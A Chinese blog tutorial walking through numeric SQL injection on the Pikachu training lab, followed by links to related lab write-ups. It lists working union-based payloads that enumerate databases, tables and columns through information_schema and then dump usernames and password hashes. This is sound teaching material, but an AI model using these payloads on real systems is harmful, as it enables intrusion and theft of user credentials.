pikachu(皮卡丘)靶场 sql数字型注入 详细讲解

原创 已于 2025-05-08 07:12:18 修改 · 862 阅读 · 12 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#sql #数据库

于 2025-04-30 01:09:40 首次发布

实验环境以及工具

phpstudy,burpsuite,pikachu,Navicat Premium 16

首先bp(burpsuite)抓包,放到Repeater(重放器)

这里知道是数字型就不做字符数字型判断了

1.判断是否有注入点

(1)将id=1改为id=1 and 1=1(页面正常)

(2)将id=1改为id=1 and 1=2(页面报错)

说明是存在注入点的 

2.通过order by语句判断有几个注入点()

(1)id=1 order by 2(页面正常)

(2)id=1 order by 3(页面报错)

说明有两个注入点

3.尝试union联合来确定注入点

id=1 union select 1,2 (随便2个数字)

 4.爆数据库(可以看到名为pikachu的数据库)

id=1 union select 1,database()

5.爆表名 

id=1 union select 1,table_name from information_schema.tables where table_schema='pikachu'

下面图可以看到关键词users 

 

这里我详细解释一下table_name,information_schema.tables,table_schema(我第一次学的时候想好久没想明白) 

  • information_schema.tablesinformation_schema 是 MySQL 自带的系统数据库,其中的 tables 表是系统表,它存储了 MySQL 服务器中所有数据库和表的元数据信息,是真实存在且可以被查询的。通过查询这个表,能获取各个数据库中的表名、表类型、创建时间等详细信息。
  • table_name 是一个列名,通常用于表示数据库中表的名称。在 SQL 查询里,它代表从某个表中选取的这一列数据。
  • table_schema 是 information_schema.tables 表中的一个列,用于存储每个表所属的数据库名称。

还没理解的话可以仔细看看这张图, 这是Navicat Premium 16(数据库可视化工具)

7.爆列名

id=1 union select 1,column_name from information_schema.columns where table_name='users' 

 

可以看到username和password列 

8.爆密码

id=1 union select username,password from users 

最后这里是md5加密😊

Pikachu靶场详细教程
Vicky_Li02的博客
12-10 2061
Pikachu是一个带有漏洞的Web应用系统,在这里包含了常见的web安全漏洞。 如果你是一个Web渗透测试学习人员且正发愁没有合适的靶场进行练习,那么Pikachu可能正合你意。
SQL注入pikachu靶场中的SQL注入通关
qq_68163788的博客
05-24 4313
SQL注入是一种常见的网络攻击技术,攻击者利用应用程序对用户输入数据的处理不当,通过在输入字段中插入恶意的SQL代码,从而实现对数据库的非法访问和控制。通过成功利用SQL注入漏洞,攻击者可以执行未经授权的操作,如删除、修改或获取敏感数据。在pikachu靶场中,玩家需要利用自己的技能和知识,深入了解SQL注入的原理和方法,通过不断尝试和实践,最终成功通关。这个过程不仅可以帮助玩家提升对SQL注入漏洞的识别和防范能力,还能加深对网络安全的理解和认识。
pikachu靶场通关笔记21 SQL注入04-XX型注入(GET)
mooyuan的网络安全博客
06-09 1146
本系列为通过《pikachu靶场通关笔记》的SQL注入关卡(共10关)渗透集合,通过对XX型注入关卡源码的代码审计找到SQL注入风险的真实原因,讲解XX型注入的原理并进行渗透实践,本文为SQL注入04之XX型注入关卡的渗透部分。
pikachu靶场搭建
最新发布
weixin_55674827的博客
07-16 351
1、访问http://127.0.0.1/pikachu/install.php。1、将pikachu源码文件粘贴复制到phpstudy安装目录下的www文件夹。2、若要重置靶场,再次访问install.php进行安装初始化即可。2、点击安装初始化,成功后进入pikachu首页。php版本选择5.6.9(高版本可能会报错)1、每次启动需打开apache+mysql。2、phpstudy新建数据库。1、phpstudy下载安装。4、phpstudy新建网站。2、pikachu靶场文件。3、修改以下配置文件。
Pikachu-----Sql Inject(SQL注入
m0_65712192的博客
12-29 4433
Pikachu-----Sql Inject(SQL注入
pikachuSQL注入
qq_58091216的博客
11-04 2462
SQL注入SQLi)是一种注入攻击,可以执行恶意SQL语句。它通过将任意SQL代码插入数据库查询,使攻击者能够完全控制Web应用程序后面的数据库服务器。攻击者可以使用SQL注入漏洞绕过应用程序安全措施;可以绕过网页或Web应用程序的身份验证和授权,并检索整个SQL数据库的内容;还可以使用SQL注入来添加,修改和删除数据库中的记录。
Pikachu(皮卡丘)靶场SQL注入
剁椒鱼头没剁椒的博客
12-14 6087
1)宽字节注入指的是 mysql 数据库在使用宽字节(GBK)编码时,会认为两个 字符是一个汉字(前一个 ascii 码要大于 128(比如%df),才到汉字的范围),而且当我们输入单引号时,mysql 会调用转义函数,将单引号变为’,其中\的十 六进制是%5c,mysql 的 GBK 编码,会认为%df%5c 是一个宽字节,也就是’運’,从而使单引号闭合(逃逸),进行注入攻击。输入kobe’ and 1=1#的时候页面正常,并且kobe’ and 1=2#页面不正常,证明使用单引号闭合。
Pikachu靶场-SQL注入
sucker的博客
04-21 2118
搜索型SQL注入发生在网站的搜索功能模块中,由于开发者未对用户输入进行有效过滤,导致攻击者可通过构造恶意输入篡改SQL查询逻辑。UPDATE注入发生在应用程序将用户输入直接拼接到UPDATE语句中,允许攻击者修改数据库中的现有数据,可能导致数据篡改、权限提升或信息泄露。SQL注入中的INSERT注入发生在应用程序将用户输入不安全地拼接到INSERT语句中时,允许攻击者操纵数据库操作。是一种需要特定闭合符号的SQL注入类型,其核心在于识别并绕过SQL语句中的闭合符号(如单引号或括号),从而构造恶意查询。
通关pikaqu靶场sql注入数字型(一)
Alphamilk的博客
03-21 534
通过burp suite实现对目标网站sql注入,得到所有用户的数据
pikachu靶场-SQL-Inject
braty_的博客
02-23 1606
在owasp发布的top10排行榜里,注入漏洞一直是危害排名第一的漏洞,其中注入漏洞里面首当其冲的就是数据库注入漏洞。一个严重的SQL注入漏洞,可能会直接导致一家公司破产!SQL注入漏洞主要形成的原因是在数据交互中,前端的数据传入到后台处理时,没有做严格的判断,导致其传入的“数据”拼接到SQL语句中后,被当作SQL语句的一部分执行。从而导致数据库受损(被脱裤、被删除、甚至整个服务器权限沦陷)。
pikachu靶场通关之sql注入
qq_74825121的博客
01-21 3721
pikachu靶场通关之sql注入
2022.7.28皮卡丘靶场SQL注入作业
weixin_44503202的博客
07-29 802
sqlmap注入
pikachu-数字型注入-sqlmap
bangyan3903的博客
08-12 649
题目链接:http://127.0.0.1/pikachu-master/vul/sqli/sqli_id.php 题目来源:pikachu-->SQL-inject-->数字型注入(post) 任意提交数据,使用bp抓包得到post方式提交的参数为 id=1&submit=%E6%9F%A5%E8%AF%A2 使用sqlmap跑post方式时的格式...
pikachu SQL注入 (皮卡丘漏洞平台通关系列)
热门推荐
箭雨镜屋
05-01 2万+
一、官方的戏精引言 本节引用来自pikachu漏洞靶场 哦,SQL注入漏洞,可怕的漏洞。 在owasp发布的top10排行榜里,注入漏洞一直是危害排名第一的漏洞,其中注入漏洞里面首当其冲的就是数据库注入漏洞。一个严重的SQL注入漏洞,可能会直接导致一家公司破产! SQL注入漏洞主要形成的原因是在数据交互中,前端的数据传入到后台处理时,没有做严格的判断,导致其传入的“数据”拼接到SQL语句中后,被当作SQL语句的一部分执行。 从而导致数据库受损(被脱裤、被删除、甚至整个服务器权限沦陷)。 ...
皮卡丘--sql注入
renyizou的博客
06-21 699
概述: 在owasp发布的top10排行榜里,注入漏洞一直是危害排名第一的漏洞,其中注入漏洞里面首当其冲的就是数据库注入漏洞。 一个严重的SQL注入漏洞,可能会直接导致一家公司破产! SQL注入漏洞主要形成的原因是在数据交互中,前端的数据传入到后台处理时,没有做严格的判断,导致其传入的“数据”拼接到SQL语句中后,被当作SQL语句的一部分执行。 从而导致数据库受损(被脱裤、被删除、甚至整个服务器权限沦陷)。 在构建代码时,一般会从如下几个方面的策略来防止SQL注入漏洞: 1.对传进SQL语句里面的
重现pikachu sql数字型字符型注入(作业)
qq_43473164的博客
03-24 1159
重现pikachu sql数字型字符型注入 本周对于sql注入有了一定的了解,我亲自在pikachu上进行了实验,以下为我的实验内容 sql数字型注入 连接数据库,这里我直接使用phpstudy集成环境. 输入 select * username,email from member where id = 1 or 1 = 1 效果如下 很明显,条件恒为真,遍历出所有username 和 emai...
Pikachu SQL注入数字型注入
SS_liang的博客
01-11 1810
我们在点击选择框里面的123456时,url没有变化,不是get请求,我们直接抓包试试:1. GET请求:GET请求用于从服务器获取资源,通过将参数附加在URL的末尾来传递数据。这些参数以键值对的形式出现在URL的查询字符串中,例如:http://example.com?GET请求的特点包括:- 数据以明文形式出现在URL中,可以被缓存、书签等记录。- 传输的数据量有限,受URL长度限制。- 数据通过URL传输,对于敏感信息不太安全。- GET请求可被浏览器主动缓存。
pikachu-sql注入
Resets_的博客
04-01 703
pikachu sql数字型注入,字符型注入
Pikachusql数字型注入
m0_63152656的博客
09-24 559
pikachusql数字型注入 及 终端打开小皮数据库
pikachu 靶场数字型注入
03-29
好的,用户需要关于Pikachu靶场数字型SQL注入的实验教程。首先,我得回忆一下Pikachu靶场的结构,数字型注入和字符型注入的区别。数字型通常不需要闭合引号,直接注入即可。用户提供的引用中提到了使用'union ...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值